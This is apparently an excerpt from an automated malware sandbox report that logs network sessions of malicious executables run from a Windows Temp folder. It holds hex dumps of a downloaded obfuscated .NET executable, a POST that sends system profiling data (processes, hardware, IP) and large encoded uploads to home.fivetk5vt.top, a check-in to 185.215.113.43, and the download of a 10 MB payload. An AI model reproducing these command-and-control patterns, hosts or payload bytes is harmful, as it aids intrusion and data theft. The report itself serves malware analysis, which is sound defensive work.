                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$cg02 @ `@WH/@ H.text `.rsrcH/0@@.reloc@@BH<K`pY?F60584zc:VN01O*S~IpRiIPn}iJ!BH+o/Syj8T'}yIkD'$6}w[ )j[-0|ph\LRT~bKh"8s`)1 [i&9a?FN~_^Q43L@vxIB4|(~YLS;x)wv:2y%{3w)^7@7k
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430170059 CET224INData Raw: c5 aa 48 9b ae 70 7d f1 84 22 02 e3 af 25 ff 70 0b a7 0d f0 30 e9 b8 67 c4 33 a1 c7 f4 e2 67 07 b9 1d 13 d5 b0 15 b7 9a 9c f0 4c 20 85 a8 02 8b 95 86 b3 8e 7d 65 ab 63 4d 56 2e 77 fb 94 14 cb 5e 76 61 bc 07 61 d8 0e 44 fa a3 52 50 b7 c7 84 0f 72
                                                                                                                                                                                                                                                          Data Ascii: Hp}"%p0g3gL }ecMV.w^vaaDRPr|>CNbYluH#61Z:';)5q2}KK'Rm!a;ijxL8MMWYbp{,mgT%
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430181026 CET1236INData Raw: 03 9a 99 28 de 39 c1 02 3c 9f 5f 07 7b 3b b2 00 b7 ae d7 74 6f 85 80 52 4f 1f 65 f3 11 d5 ea aa cb 37 b8 97 99 bd 98 59 d6 b2 7d 58 2f 03 43 c3 c0 83 99 4e 37 53 11 b3 a4 15 45 24 c0 eb f4 28 0a f6 b8 1d 22 b0 9e 28 a5 23 9f b0 3d 01 06 1a fd 14
                                                                                                                                                                                                                                                          Data Ascii: (9<_{;toROe7Y}X/CN7SE$("(#=E@pw9RoyorX]i#-da,WQgn1ttuOG_gyf=O'\@&e:NJMqxC(R9VobP#k
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431080103 CET1236INData Raw: 00 00 0a 13 04 06 6f 10 00 00 0a 1f 0d 6a 59 13 05 07 06 11 04 11 05 09 6f 1a 00 00 06 2a 00 00 00 13 30 07 00 e8 04 00 00 03 00 00 11 20 80 01 00 00 0a 20 80 01 00 00 8d 2c 00 00 01 25 d0 02 00 00 04 28 11 00 00 0a 0b 1f 10 8d 2c 00 00 01 0c 20
                                                                                                                                                                                                                                                          Data Ascii: ojYo*0 ,%(, 79d : a%$^E${?P@ZW6Qv!_8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431106091 CET1236INData Raw: 5d f2 34 5a 20 85 d8 21 a1 61 38 79 fb ff ff 11 06 1f 0d 11 06 1f 0d 95 08 1f 0d 95 61 9e 11 06 1f 0e 11 06 1f 0e 95 08 1f 0e 95 61 9e 11 0c 20 92 86 6d 1c 5a 20 ed a5 68 b5 61 38 48 fb ff ff 2a 13 30 08 00 a7 02 00 00 04 00 00 11 02 20 ff ba 88
                                                                                                                                                                                                                                                          Data Ascii: ]4Z !a8yaa mZ ha8H*0 Z &a JGW 8a%^E0U;H8C~%X~%Xb`~%Xb`~%Xb`~%
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431121111 CET672INData Raw: 00 0a 6f 13 00 00 0a 11 05 28 14 00 00 0a 13 06 11 07 20 f4 67 21 0a 5a 20 b3 62 bc 69 61 38 2b fe ff ff 06 6e 16 6a 33 08 20 d7 16 a9 e8 25 2b 06 20 81 22 6b af 25 26 38 11 fe ff ff 06 6e 18 6a 2e 08 20 1a 68 5b a7 25 2b 06 20 8e da 3d ff 25 26
                                                                                                                                                                                                                                                          Data Ascii: o( g!Z bia8+nj3 %+ "k%&8nj. h[%+ =%&8~%X~%Xb`~%Xb`~%Xb` dZ oa8 TG@Z ba8~( P0Z g6a8h*0
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.432712078 CET1236INData Raw: 11 06 16 11 04 1a 59 28 15 00 00 0a 11 07 20 12 3d ba 3e 5a 20 99 dd 12 ff 61 38 4a fe ff ff 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25 17 58 10 00 91 1f 10 62 60 7e 01 00 00 04 02 25 17
                                                                                                                                                                                                                                                          Data Ascii: Y( =>Z a8J~%X~%Xb`~%Xb`~%Xb` )Z ?a8nj3 ?7%+ $%&8~( Z Xra8(o( Z >Y'a8~%X~
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433417082 CET1236INData Raw: ff ff ff b5 00 00 00 90 00 00 00 97 02 00 00 15 00 00 00 f5 00 00 00 7c 02 00 00 38 92 02 00 00 11 07 20 08 ed 6e af 5a 20 53 79 c3 a4 61 2b 8e 7e 01 00 00 04 02 25 17 58 10 00 91 7e 01 00 00 04 02 25 17 58 10 00 91 1e 62 60 7e 01 00 00 04 02 25
                                                                                                                                                                                                                                                          Data Ascii: |8 nZ Sya+~%X~%Xb`~%Xb`~%Xb` Z ka8>(o( LZ a8~Y( BEKZ a8~( wJZ )ta8
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433429003 CET1236INData Raw: 00 8f 00 00 00 05 00 00 11 17 0a 20 b0 02 07 2b 20 6d 7c 48 27 61 25 0b 1c 5e 45 06 00 00 00 d4 ff ff ff 15 00 00 00 60 00 00 00 4e 00 00 00 2d 00 00 00 02 00 00 00 2b 5e 06 17 58 0a 07 20 fa 04 62 c3 5a 20 81 09 57 40 61 2b c4 02 7b 04 00 00 04
                                                                                                                                                                                                                                                          Data Ascii: + m|H'a%^E`N-+^X bZ W@a+{( Fb+n{_bj2 [3%+ sBF%&+ dZ wa8y*0{ B vka%^E*HW+U1 )H%+ R%&+
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433442116 CET1236INData Raw: 5a 20 3e 69 f8 1e 61 2b 80 02 07 7d 06 00 00 04 11 05 20 e7 08 ee b2 5a 20 9e 3c 06 1c 61 38 66 ff ff ff 09 16 31 08 20 a1 d8 bf 8a 25 2b 06 20 43 75 16 89 25 26 38 4e ff ff ff 06 20 00 00 00 01 37 08 20 34 9b b4 52 25 2b 06 20 f6 6b 9c 21 25 26
                                                                                                                                                                                                                                                          Data Ascii: Z >ia+} Z <a8f1 %+ Cu%&8N 7 4R%+ k!%& },Za8)b{o`b y-?Z Ra8} xaZ 6sa8d 58Y ^&8{ 2["Z pda8*0(
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.551835060 CET1236INData Raw: 61 38 c2 fe ff ff 02 7b 10 00 00 04 6f 22 00 00 06 16 0a 09 20 23 4d 23 fd 5a 20 95 8f ac 96 61 38 a3 fe ff ff 07 02 7b 1a 00 00 04 36 08 20 a8 10 aa df 25 2b 06 20 71 e0 76 f0 25 26 38 86 fe ff ff 02 7b 12 00 00 04 06 8f 02 00 00 02 28 09 00 00
                                                                                                                                                                                                                                                          Data Ascii: a8{o" #M#Z a8{6 %+ qv%&8{( "8kX zZ {S8a8U .1Z a a8CbX 83{({({(X T`Z a84 Yt%+ %&8


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.449774176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.637651920 CET12360OUTPOST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                                                                                                                                                                                                                          Host: home.fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 500840
                                                                                                                                                                                                                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 36 31 34 34 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734614443", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.777741909 CET4944OUTData Raw: 54 68 55 72 51 6c 56 79 37 4c 73 31 78 4b 71 79 6a 4e 4b 6c 46 59 52 77 6b 30 2b 65 63 46 71 5c 2f 78 30 6f 72 2b 73 4e 76 2b 43 4d 5c 2f 37 47 2b 53 41 33 78 63 48 4a 48 48 6a 72 54 76 5c 2f 41 47 62 77 73 61 71 76 5c 2f 77 41 45 61 50 32 4f 38
                                                                                                                                                                                                                                                          Data Ascii: ThUrQlVy7Ls1xKqyjNKlFYRwk0+ecFq\/x0or+sNv+CM\/7G+SA3xcHJHHjrTv\/AGbwsaqv\/wAEaP2O8Aif4vjIPTxzpPbd\/e8In0r+cl9OXwmf\/NO+Iv8A4aeGfX\/orvM\/q3\/inN43f9FT4V\/+Hvi7\/wCgc\/lGqOTt+P8ASv3G\/ad\/4Ja6DoOgfEnVv2dpfEWpap8MfFttp114W8Q6jHq+reJPD938N\/APjCa
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.777790070 CET19776OUTData Raw: 2f 77 41 2b 2b 66 38 41 36 39 52 4e 39 35 30 64 5c 2f 77 44 74 70 2b 46 41 45 43 78 6e 2b 41 6e 65 49 79 66 4d 6b 5c 2f 38 41 62 53 30 5c 2f 70 2b 57 4f 61 4f 50 2b 6d 66 38 41 30 31 5c 2f 35 34 66 38 41 58 31 64 5c 2f 68 30 5c 2f 6e 69 70 6f 34
                                                                                                                                                                                                                                                          Data Ascii: /wA++f8A69RN950d\/wDtp+FAECxn+AneIyfMk\/8AbS0\/p+WOaOP+mf8A01\/54f8AX1d\/h0\/nipo45Gbb+7Z4\/TPQVDH80n9\/y+0nrz\/T3rP2fn+H\/BNKfX5fqM+eONI0eMfvbn95\/wA9vx9fX6Yoz\/GjyQvL+98z\/UQDP8+\/FPaT5mT78cf7r\/Vcd\/8ASs+lPkjddmxP5\/aPr29v\/rmszQ\/ch\/vH8P5
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.903235912 CET4944OUTData Raw: 58 34 4b 43 7a 2b 46 74 70 34 49 38 66 36 4c 72 47 6b 65 49 62 62 77 5c 2f 77 44 43 37 77 6e 34 4a 6e 64 74 66 74 68 61 61 70 71 39 75 6e 67 4f 79 38 4c 36 61 4e 62 75 49 31 56 6e 31 43 35 30 32 36 61 56 31 52 70 34 35 74 6f 41 2b 57 74 51 38 4c
                                                                                                                                                                                                                                                          Data Ascii: X4KCz+Ftp4I8f6LrGkeIbbw\/wDC7wn4Jndtfthaapq9ungOy8L6aNbuI1Vn1C5026aV1Rp45toA+WtQ8L2unXniPwmfib8HL740eDPDGpeKfGX7Oum+JPHVz8YfDcPh7SR4j8YeHbi6f4ZQfBjU\/H3gjwwl7rvi34a+H\/jHq\/xB0b+x9e8PT+GD4x0HWPDdlxuoSrY\/BK4+P32\/QZvh\/beMk8GyIutxp4nZfstubjxdF
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.903269053 CET9888OUTData Raw: 55 61 31 4b 61 61 6e 54 71 30 70 75 46 53 6e 4a 64 4a 51 6e 46 78 6b 75 6a 54 47 56 48 4a 32 5c 2f 48 2b 6c 53 55 56 6f 51 56 36 4b 6b 5c 2f 35 61 66 35 5c 2f 75 31 48 51 41 56 48 4a 32 5c 2f 48 2b 6c 53 55 55 48 51 56 36 4b 4b 4b 41 47 76 39 30
                                                                                                                                                                                                                                                          Data Ascii: Ua1KaanTq0puFSnJdJQnFxkujTGVHJ2\/H+lSUVoQV6Kk\/5af5\/u1HQAVHJ2\/H+lSUUHQV6KKKAGv90\/h\/MVDVion6\/h\/U0HQMooooAhf7x\/D+QptPfr+H9TTKDoIzH6fiD\/n9MVC\/3T+H8xVqoX+8fw\/kKAKtFTP90\/h\/MUzb8ue\/X8P88\/pXQdAyoX+8fw\/kKmooAr0U\/Yfb\/P4U0qV\/+tQdAlV6sV
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.941407919 CET27192OUTData Raw: 55 45 32 67 36 46 63 4f 6b 6b 2b 69 36 54 4f 38 66 38 41 71 33 6d 30 36 7a 6b 64 4f 64 33 79 4d 38 4c 46 65 65 66 6c 49 35 35 36 31 34 38 5c 2f 6f 55 5a 4d 73 6f 77 6d 55 59 62 6a 6e 4f 73 50 54 79 37 4c 38 39 77 47 42 72 72 42 5a 63 38 52 52 6c
                                                                                                                                                                                                                                                          Data Ascii: UE2g6FcOkk+i6TO8f8Aq3m06zkdOd3yM8LFeeflI556148\/oUZMsowmUYbjnOsPTy7L89wGBrrBZc8RRlxRWwWKz\/MJVo4eFStmGLx2BhjqEq8quEwWInUhhMHQwkvqq+hwf7RLiShxDmvEdfw54dxWMz2dV5rSnj80eGr0YZNnXD+XYOlh5YmVDDYTL8ozutg4Qw1KjVxcMJgquZVsdiYVsRX+DdT8deCBF+1H8XPh94s8Tf
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.062566996 CET8652OUTData Raw: 6e 5c 2f 77 55 61 38 4b 36 56 38 59 37 33 78 74 6f 33 77 37 74 66 42 4f 74 66 73 6d 5c 2f 74 43 36 50 65 54 65 4c 66 45 57 70 32 57 6b 36 44 70 34 31 4b 39 74 45 30 4e 62 54 56 37 76 55 62 42 39 4f 31 31 74 55 48 68 2b 37 73 4c 79 32 31 61 48 56
                                                                                                                                                                                                                                                          Data Ascii: n\/wUa8K6V8Y73xto3w7tfBOtfsm\/tC6PeTeLfEWp2Wk6Dp41K9tE0NbTV7vUbB9O11tUHh+7sLy21aHVG0qZL1vpH\/goT\/wVA8d\/sr\/Hj9rT4IfA74aWvgX9pLxSfCnwx+K37WNz8SNZ8Y63p\/gnSfBXh64h8A\/s3+CJvC3hnTPgB4K0y+vr7+x7Sx1LxTfQG4bW2uV8WWuia\/on\/LjLw0zLgilRznxPyLNMmy2tP
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.109668970 CET1236OUTData Raw: 44 45 35 55 74 47 68 48 35 64 34 6c 38 4a 34 6a 6a 72 67 50 69 66 68 44 43 59 75 68 67 4d 54 6e 2b 57 54 77 46 48 47 59 6d 6e 55 71 30 4d 50 4f 64 53 6c 4e 56 4b 74 4f 6c 2b 38 6c 46 4b 6d 30 31 48 58 55 5c 2f 7a 56 38 47 2b 4f 38 4a 34 5a 65 4b
                                                                                                                                                                                                                                                          Data Ascii: DE5UtGhH5d4l8J4jjrgPifhDCYuhgMTn+WTwFHGYmnUq0MPOdSlNVKtOl+8lFKm01HXU\/zV8G+O8J4ZeKHBXH2PwGJzPB8LZzSzTEYDCVKVHE4qnTo1qbpUalZOlCbdVNOa5dGmfo7+xT\/wTw+OX7QHxW8Tfte\/tL+OfFnhn48fCr9rjwfeXXg\/XdHmuG1O9+FXivwZ4y8Wx6xcXZDpoereHp7XRPhmPDkq6Hp+n2un39vL
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.323909044 CET1236OUTData Raw: 66 46 4c 47 63 58 35 48 77 33 69 70 34 5c 2f 4b 63 69 77 6d 54 63 4f 38 4c 35 46 53 7a 47 64 4f 64 48 2b 30 71 32 53 38 4a 35 54 6b 65 56 34 7a 4d 71 64 43 72 57 77 39 44 4d 63 5a 67 36 2b 4e 6f 59 61 76 58 77 39 48 45 51 6f 31 36 30 4a 78 30 7a
                                                                                                                                                                                                                                                          Data Ascii: fFLGcX5Hw3ip4\/KciwmTcO8L5FSzGdOdH+0q2S8J5TkeV4zMqdCrWw9DMcZg6+NoYavXw9HEQo160Jx0zaf7x\/wA\/jT6K\/fD+M+d+X9fMKbsP\/PT\/ANCrdk8KeNY\/h9efFs\/D34lP8JtPju5b74qw\/Dfx1P8ADKzisNSfRr6S6+IEHh+TwjBHZ6xHJpN08usKtvqaNp8pS7Hk1zU7SW134gsLjTdfgv8AwlpceueLL
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.627382994 CET1236OUTData Raw: 55 61 69 6a 55 68 4c 45 34 65 4d 6f 70 31 71 61 6c 59 6f 71 6e 62 58 30 4e 33 5a 33 4f 6f 77 52 58 7a 36 64 5a 61 35 5a 2b 47 62 37 55 47 30 7a 55 6f 37 43 77 38 53 61 68 62 61 6e 65 32 50 68 36 5c 2f 76 5a 62 52 4c 61 78 31 79 38 73 39 46 31 6d
                                                                                                                                                                                                                                                          Data Ascii: UaijUhLE4eMop1qalYoqnbX0N3Z3OowRXz6dZa5Z+Gb7UG0zUo7Cw8Sahbane2Ph6\/vZbRLax1y8s9F1m6ttJu5Yb+e30jU5o7do7C7aK5XqYbGYTGRlPB4rD4qEHGMp4atTrxjKdOFaEZSpSkk5UatOrFN3lTqQmrxnFvzMZgMfl840sfgsXgak1UlCnjMNWw05KlXq4aq4wrQhKSp4mhXw9RpNQr0atKVqlOcUVE\/X8P6mp
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:47.674365044 CET63036OUTData Raw: 6a 4a 78 6c 46 76 2b 76 50 38 41 69 66 48 36 55 4e 73 4d 33 34 55 38 47 57 78 6d 4c 6e 67 4d 47 33 77 4e 34 69 57 78 57 4f 70 7a 64 4f 70 67 73 4d 5c 2f 39 63 50 33 2b 4c 68 4f 45 34 54 77 31 4c 6d 72 51 6e 47 55 58 42 4f 4e 6c 5c 2f 54 45 66 2b
                                                                                                                                                                                                                                                          Data Ascii: jJxlFv+vP8AifH6UNsM34U8GWxmLngMG3wN4iWxWOpzdOpgsM\/9cP3+LhOE4Tw1LmrQnGUXBONl\/TEf+CyX7Ko6eEfjw308IeA\/\/ZvigK\/DL9sz40+FP2hf2jviB8XfBFlr+n+GPFUPg6PTbPxPZ2FhrkJ8PeBfDXhi8N9a6XqmtWEXm3+jXU9t5Gp3W+zkt3lMM7SW8Xy3qP2vRZVg13RfEvh6d9U8QaJFb+I\/CviTw\
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:49.952112913 CET164INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx/1.22.1
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:20:49 GMT
                                                                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          content-length: 26
                                                                                                                                                                                                                                                          Data Raw: 62 55 62 43 33 77 56 30 6b 50 32 59 73 49 52 4d 31 37 33 34 36 31 34 34 34 38
                                                                                                                                                                                                                                                          Data Ascii: bUbC3wV0kP2YsIRM1734614448


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.449776185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:49.037010908 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017625001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.480057001 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:50 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.449778176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:50.394823074 CET123OUTGET /hLfzXsaqNtoEGyaUtOMJ1734514745?argument=bUbC3wV0kP2YsIRM1734614448 HTTP/1.1
                                                                                                                                                                                                                                                          Host: home.fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.044538975 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx/1.22.1
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:20:51 GMT
                                                                                                                                                                                                                                                          content-type: application/octet-stream
                                                                                                                                                                                                                                                          content-length: 10816560
                                                                                                                                                                                                                                                          content-disposition: attachment; filename="3EoRfJgTGTVJkI;"
                                                                                                                                                                                                                                                          last-modified: Wed, 18 Dec 2024 09:39:05 GMT
                                                                                                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                                                                                                          etag: "1734514745.3970041-10816560-1399330581"
                                                                                                                                                                                                                                                          Data Raw: 1f d3 b8 f9 48 23 e6 ab e2 6f 4e 39 34 0e 37 71 e9 15 f5 d5 48 ac a9 8e 73 ae ae 8f 65 19 a3 59 2b 9b f9 5b 59 41 77 f8 92 f5 c2 cb 78 d2 d7 ba 88 44 aa 97 9b 59 23 e7 96 54 07 b2 3b 56 ad 75 9b 9f f3 b3 36 90 d6 d3 a9 67 51 92 ec b7 f0 f6 ba 0c c4 82 82 60 82 8a 0c aa 9c cb 03 03 c4 22 72 c1 2c 7a bd c2 21 aa 3c 2c 1c c6 94 94 9d 86 39 d7 db 82 46 f1 3a 04 14 24 07 20 ee f8 2a f7 58 eb f6 99 45 57 be 23 73 1b 76 33 bc 7b fd 30 8c bc 1c f0 ea a8 2e 8d 4d 1d 72 9e c6 2b 66 29 4c ad 5f 01 9b ff 3d b8 79 46 ea 95 db 24 8e aa ea eb 3f 5a 5d be fc 0f b9 f1 28 2b fc 0d f5 43 d0 f1 bd b0 29 47 21 99 56 ff d2 b8 72 2e 77 5c e3 c3 34 86 06 45 1b 3b ac 42 23 51 dc cc 26 97 7e 54 79 52 94 e6 86 aa 8f e8 2d 29 a8 c0 64 28 b3 7b e5 f5 2b 2c fa 54 c5 02 06 a3 e5 00 4a 3f 8d 60 b6 da 9c 71 2f d1 02 d4 88 d7 b6 3f 11 76 d8 2a a7 f1 c8 a4 44 86 6d 16 20 f9 8f 3e 13 09 5f ca 88 3c 27 83 f4 3b d6 df de 7b 33 4e f1 08 0f b2 cc a7 08 ff d9 f5 d3 e7 87 f0 cb e8 48 86 6d 17 05 0e 97 63 79 74 b4 92 ea 78 1f 34 f7 15 b7 2c [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: H#oN947qHseY+[YAwxDY#T;Vu6gQ`"r,z!<,9F:$ *XEW#sv3{0.Mr+f)L_=yF$?Z](+C)G!Vr.w\4E;B#Q&~TyR-)d({+,TJ?`q/?v*Dm >_<';{3NHmcytx4,QDOXKQ:S: z3NhJe9 m*9RweCq*Lq4xA^0q=:%69cbmNT~D`}S=G$|R)07opsQ[bJ~\/tMy_Pr?y9+(fw%H "<N88*DE}X@_B9uI3[>>$tQ2jm\$^!N\"fJ/a.(3=3AB7eS_tRCma6qo?Dz@(UZ^g{) ??oeOHE&Dy1%KS/TD=A]4tF16k50S,bbHs9P/1JhcA(,_ow0swHv=m/@"=Alst>E4,G2X{{Al8M
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.044552088 CET1236INData Raw: 5d ac f4 d9 8c d0 32 0f 96 13 e5 2d 8a b3 60 9a 31 5d 6f 19 a1 97 e5 ef 19 35 3e a2 80 74 8a 20 18 bd 80 5f de e5 db 19 40 4a 9f 22 59 e9 1d d7 b9 35 12 85 ba 1c 84 c2 cf 36 cc 45 05 80 35 ce 1a 47 a3 e8 17 e3 a0 96 e4 d0 39 46 58 c9 61 70 95 1d
                                                                                                                                                                                                                                                          Data Ascii: ]2-`1]o5>t _@J"Y56E5G9FXap{;#gJ0rAt.^Zvmer*BP&BkGB{{(akOLe(%r{IA6mcXq'AuQd?7rD41)L%#[:j8e
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.045186996 CET1236INData Raw: 50 7b 6c 0a 76 1c f4 5d 07 1d b1 08 6a a4 54 91 6c 08 e1 06 0c 76 2c a2 19 8c 3c 1f cc f5 2c 94 da d4 42 bb c9 dc 70 00 24 4a e9 09 53 e3 7e 91 d6 ea 21 0f 52 ee 79 64 e1 e8 48 ff 56 28 e6 0e 63 74 97 33 06 ce e6 43 da b3 66 1c 8f 5b 2a fc 66 11
                                                                                                                                                                                                                                                          Data Ascii: P{lv]jTlv,<,Bp$JS~!RydHV(ct3Cf[*fp3iFw\x;}4:]zfy6L*'i6F}0\%LZW6&K*\7OfzQNF!3?2GjIB9Z^5#iZ+W;'R|]:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:52.045200109 CET1236INData Raw: 4f 8f 48 33 5f 07 7f 5f b4 42 67 89 34 b9 78 c0 26 b9 f0 a5 02 79 6b 8c 2d 9f 79 00 78 c9 5f 27 18 54 7a 9e 68 e0 e7 cb 05 8d 38 3c f9 3f cc 55 56 b6 a0 c5 a5 53 aa d8 84 19 75 54 13 fc 7f d1 b0 39 2e f9 7d c4 63 b3 33 78 7d df ff be 88 56 e6 26
                                                                                                                                                                                                                                                          Data Ascii: OH3__Bg4x&yk-yx_'Tzh8<?UVSuT9.}c3x}V&n$#;K6L61,ub a:@Aqp.K*]_sn]qO2J/\}-N{Vk|QmKt8Z/y4#S[8oEh0v@8U;'MRHX
